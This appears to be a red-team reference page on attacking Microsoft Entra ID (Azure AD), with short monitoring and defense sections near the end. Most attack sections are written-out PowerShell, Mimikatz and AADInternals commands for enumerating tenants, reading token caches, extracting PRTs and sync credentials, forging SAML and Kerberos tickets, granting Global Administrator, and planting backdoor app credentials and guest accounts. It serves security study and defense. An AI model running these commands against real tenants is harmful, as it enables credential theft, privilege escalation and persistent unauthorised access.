Azure AD (Entra ID) Attacks

Microsoft Entra ID (Azure AD) attacks including enumeration, privilege escalation, token abuse, and hybrid identity exploitation.

Introduction

Microsoft Entra ID (formerly Azure Active Directory) is the identity backbone of Microsoft's cloud ecosystem, serving as the authentication provider for Microsoft 365, Azure resources, and thousands of third-party applications. Its deep integration with on-premises Active Directory through hybrid deployments creates unique attack vectors that span both environments.

Understanding Entra ID security is essential for any organization using Microsoft cloud services, as compromising a single identity can lead to access across multiple applications and resources.

Entra ID Architecture

Key Components

Component	Description
Tenant	Organization's Entra ID instance
Users	Human identities
Groups	Collections of users/devices
Service Principals	Application identities
Managed Identities	Azure resource identities
Applications	Registered apps with permissions
Administrative Units	Delegated admin scopes

Role Hierarchy

Global Administrator
├── Privileged Role Administrator
├── Application Administrator
├── Cloud Application Administrator
├── User Administrator
├── Groups Administrator
├── Exchange Administrator
├── SharePoint Administrator
├── Intune Administrator
└── ... 60+ built-in roles

Enumeration Techniques

Unauthenticated Enumeration

# Check if tenant exists
https://login.microsoftonline.com/<tenant>/v2.0/.well-known/openid-configuration

# User enumeration via login response
# Different error messages for valid vs invalid users
# Tools: o365creeper, TeamFiltration

# Azure AD Connect exposed
# Default port 443 on AD Connect server

Authenticated Enumeration

# Using AzureAD PowerShell module
Connect-AzureAD
Get-AzureADUser -All $true
Get-AzureADGroup -All $true
Get-AzureADServicePrincipal -All $true

# Using Microsoft Graph API
Connect-MgGraph
Get-MgUser -All
Get-MgGroup -All
Get-MgServicePrincipal -All

# Get current user's roles
Get-AzureADDirectoryRole | ForEach-Object {
    $role = $_
    Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId | ForEach-Object {
        [PSCustomObject]@{
            Role = $role.DisplayName
            Member = $_.DisplayName
        }
    }
}

ROADtools Enumeration

# Authenticate
roadrecon auth -u [email protected] -p password

# Gather data
roadrecon gather

# Analyze and visualize
roadrecon gui
# Opens web interface at http://127.0.0.1:5000

AzureHound

# Collect Azure AD data for BloodHound
azurehound -u [email protected] -p password list --tenant tenant.com

# Import into BloodHound
# Analyze attack paths in BloodHound GUI

Token-Based Attacks

Access Token Theft

# Extract tokens from az cli
$tokens = Get-Content "$env:USERPROFILE\.azure\accessTokens.json" | ConvertFrom-Json

# Extract from Azure PowerShell
$context = Get-AzContext
$token = $context.TokenCache.ReadItems() | Where-Object {$_.Resource -eq "https://graph.microsoft.com"}

# Use token with Microsoft Graph
$headers = @{Authorization = "Bearer $accessToken"}
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me" -Headers $headers

Refresh Token Abuse

# Refresh tokens can get new access tokens
# If you have a refresh token, you can request access tokens for any resource the app has consent for

# Using roadrecon
roadrecon auth --refresh-token <token>
roadrecon gather

Primary Refresh Token (PRT)

# PRT is used for SSO across Azure AD-joined devices
# Extraction requires admin on device

# Using Mimikatz
sekurlsa::cloudap

# Using AADInternals
Get-AADIntUserPRTToken

# PRT can be used to get access tokens without password

Privilege Escalation

# If you can register applications or modify existing ones:

# 1. Register app with dangerous permissions
# 2. Get admin to consent (phishing, social engineering)
# 3. Use app permissions for escalation

# Dangerous permissions to request:
# - Directory.ReadWrite.All
# - RoleManagement.ReadWrite.Directory
# - Application.ReadWrite.All
# - User.ReadWrite.All

Service Principal Abuse

# If you control a service principal with privileged permissions:

# Add credentials to service principal
$creds = New-AzureADApplicationPasswordCredential -ObjectId <app-object-id>

# Authenticate as service principal
$securePassword = ConvertTo-SecureString $creds.Value -AsPlainText -Force
$pscredential = New-Object System.Management.Automation.PSCredential($appId, $securePassword)
Connect-AzureAD -Credential $pscredential -ServicePrincipal -TenantId $tenantId

Administrative Unit Escape

# If admin is scoped to AU but has certain permissions,
# they may be able to manage users outside their AU

# Check AU membership
Get-AzureADMSAdministrativeUnitMember -Id <AU-id>

Role Assignment Abuse

# If you have Privileged Role Administrator:
# Add yourself to Global Administrator

$roleDefinition = Get-AzureADMSRoleDefinition | Where-Object {$_.DisplayName -eq "Global Administrator"}
$user = Get-AzureADUser -ObjectId "[email protected]"

New-AzureADMSRoleAssignment `
    -DirectoryScopeId "/" `
    -RoleDefinitionId $roleDefinition.Id `
    -PrincipalId $user.ObjectId

Hybrid Identity Attacks

Azure AD Connect Abuse

# Azure AD Connect syncs on-prem AD to Azure AD
# The sync account has extensive permissions in both directories

# Extract credentials (requires admin on AD Connect server)
# Using AADInternals
Get-AADIntSyncCredentials

# Get the sync account password
# Can be used to DCSync on-prem or modify cloud objects

Seamless SSO Exploitation

# Seamless SSO uses a computer account AZUREADSSOACC$
# Its Kerberos keys can forge tickets for any Azure AD user

# Extract with DCSync
lsadump::dcsync /domain:corp.local /user:AZUREADSSOACC$

# Forge ticket
# This allows authentication to Azure AD as any synced user

Pass-the-PRT

# Similar to Pass-the-Hash but for Azure AD
# Requires PRT extracted from Azure AD joined device

# Using AADInternals
$prt = Get-AADIntUserPRTToken
$at = Get-AADIntAccessTokenForAADGraph -PRTToken $prt

Application Attacks

1. Attacker registers malicious application
2. Sends phishing link with OAuth consent URL
3. Victim grants consent to application
4. Application now has access to victim's data

# Defense: Restrict user consent, require admin approval

Application Secret Enumeration

# If you have Application.Read.All
Get-AzureADApplication | ForEach-Object {
    $app = $_
    Get-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId | ForEach-Object {
        [PSCustomObject]@{
            AppName = $app.DisplayName
            SecretHint = $_.CustomKeyIdentifier
            EndDate = $_.EndDate
        }
    }
}

Federation Abuse (Golden SAML)

# If you compromise AD FS signing certificate:
# Can forge SAML tokens for any federated user

# Using AADInternals
Open-AADIntOffice365Portal -ImmutableID <user-id> -Issuer <federation-url> -PfxFileName <adfs-cert.pfx>

Persistence Techniques

Application Backdoors

# Add credentials to existing application
New-AzureADApplicationPasswordCredential -ObjectId <app-object-id> -CustomKeyIdentifier "Backup"

# Add new certificate
$cert = New-SelfSignedCertificate -Subject "CN=Backdoor" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
New-AzureADApplicationKeyCredential -ObjectId <app-object-id> -Type AsymmetricX509Cert -Usage Verify -Value $keyValue

Service Principal Persistence

# Create new service principal with privileges
$app = New-AzureADApplication -DisplayName "Legitimate App"
$sp = New-AzureADServicePrincipal -AppId $app.AppId
$creds = New-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId

# Assign privileged role
New-AzureADMSRoleAssignment -RoleDefinitionId <role-id> -PrincipalId $sp.ObjectId -DirectoryScopeId "/"

Guest User Backdoor

# Invite persistent guest account
New-AzureADMSInvitation `
    -InvitedUserEmailAddress "[email protected]" `
    -InviteRedirectUrl "https://myapps.microsoft.com" `
    -SendInvitationMessage $false

# Assign roles to guest

Detection and Defense

Key Events to Monitor

# Azure AD Sign-in Logs
- Unusual locations
- Impossible travel
- Legacy authentication
- Failed MFA
- Service principal sign-ins

# Azure AD Audit Logs
- New application registrations
- Consent grants
- Role assignments
- Credential additions
- Policy changes

Defensive Measures

Conditional Access - Require MFA, block legacy auth
PIM - Just-in-time privileged access
Admin Consent Workflow - Prevent illicit consent
Privileged Access Workstations - Secure admin access
Cloud App Security - Monitor for anomalies

Tools Reference

Tool	Purpose
ROADtools	Enumeration and analysis
AzureHound	Attack path mapping
AADInternals	Offensive toolkit
MicroBurst	Security assessment
PowerZure	Offensive framework

References

MITRE ATT&CK Techniques

T1078.004 - Valid Accounts: Cloud Accounts - Azure AD credential abuse
T1087.004 - Account Discovery: Cloud Account - User enumeration
T1069.003 - Permission Groups Discovery: Cloud Groups - Role enumeration
T1098 - Account Manipulation - Role assignment abuse
T1098.001 - Account Manipulation: Additional Cloud Credentials - App credential creation
T1550.001 - Use Alternate Authentication Material: Application Access Token - Token abuse

Microsoft Documentation

Microsoft Entra ID Security - Security guidance
Conditional Access - Access controls

Security Resources

ROADtools - Azure AD enumeration
AzureHound - Attack path analysis
AADInternals - Offensive toolkit

AWS IAM Privilege Escalation - AWS identity attacks
Active Directory Attacks - On-prem AD techniques
Kerberoasting - Hybrid relevance

Azure AD (Entra ID) Attacks

On this page